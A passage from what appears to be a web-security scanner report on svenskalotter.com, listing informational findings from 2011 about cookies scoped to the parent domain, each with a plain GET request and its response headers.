Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.225. http://www.svenskalotter.com/Charity.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Charity.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.226. http://www.svenskalotter.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.227. http://www.svenskalotter.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.228. http://www.svenskalotter.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.229. http://www.svenskalotter.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_38=EncryptedUniqueVisitorID=0B0F1C435808DDA7C375069D1945E754&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=svenskalotter.com; expires=Fri, 16-May-2031 11:41:58 GMT; path=/
UniqueVisitorID=0B0F1C435808DDA7C375069D1945E754; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.svenskalotter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=flbkb455khvf04450vdrfe45; path=/; HttpOnly
Set-Cookie: CSI_38=EncryptedUniqueVisitorID=0B0F1C435808DDA7C375069D1945E754&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=svenskalotter.com; expires=Fri, 16-May-2031 11:41:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: UniqueVisitorID=0B0F1C435808DDA7C375069D1945E754; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Vary: Accept-Encoding
Content-Length: 34553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.230. http://www.svenskalotter.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.231. http://www.svenskalotter.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.232. http://www.svenskalotter.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.233. http://www.svenskalotter.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.234. http://www.svenskalotter.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.235. http://www.svenskalotter.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.236. http://www.svenskalotter.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.237. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/click/Svenskalotter.com/SWE/Home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
